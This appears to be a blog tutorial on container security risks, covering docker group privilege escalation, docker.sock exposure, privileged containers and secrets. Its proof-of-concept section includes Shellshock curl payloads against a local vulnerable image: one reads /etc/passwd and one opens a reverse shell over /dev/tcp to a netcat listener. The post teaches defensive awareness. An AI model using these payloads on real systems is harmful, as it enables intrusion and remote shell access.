Skip to content

How to level up your Container Security Journey? Part 2

A significant amount of risks with it when not properly used users who are part of the docker group can elevate their privileges to root.

As you can notice there are containers being run inside the cluster, we should focus on the full cluster attack surface.

There are two possible ways to attack a docker –

  1. External attacks
  2. Malicious insiders

The internal users who are part of the docker group can easily gain root access to the host.

Docker images are downloaded from public repos such as docker hub.

Enterprises typically use private repos.

There is a possibility that these publicly available docker images can have publicly known vulnerabilities.

Quick POC –

We are running a shellshock vulnerable image in our docker and see how we can exploit this

sudo docker run --rm -it -p 8082:80 vulnerables/cve-2014-6271
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" [<http://localhost:8082/cgi-bin/vulnerable>](<http://localhost:8082/cgi-bin/vulnerable>)

Lets have a reverse shell –

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444' " http://localhost:8082/cgi-bin/vulnerable(<http://localhost:8082/cgi-bin/vulnerable
new tab - nc -nlvp 4444

The IP address of docker0 interface- check by ifconfig & port of listener for our shell

Mitigation – Dockerscan is a tool that helps detect backdoors in a docker image.

https://github.com/cr0hn/dockerscan

Once an attacker lands on the container the next goal is to escape the container and gain access.

An attacker will use various techniques like Existing exploits, unpatched docker environments, Overpriviledged containers, Mounting dangerous mount points, etc.

docker.sock

A Docker socket is a UNIX socket, which is a backbone for managing containers.

When we type docker commands using docker CLI client, it interacts with docker daemon using the UNIX socket. This socket can be exposed over the network on a specific port – HTTP API

UNIX socket is the default setting, Mounting /var/run/docker.sock into the container is dangerous.

— privileged flag

When a privileged flag is used with a container, it provides all Linux capabilities to the container.

cap_sys_admin, cap_sys_ptrace, and cap_sys_module are some of the dangerous capabilities to name.

When an attacker gains a shell on the container and if it has cap_sys_module enabled, it is possible to load a kernel module directly onto the host’s kernel from within the container.

Accessing Secrets

Secrets are usually kept in places such as environment variables or within the source code.

Anyone with access to the container can easily read these secrets. A user with privileged access on the host can also access secrets residing inside the container – docker inspects away.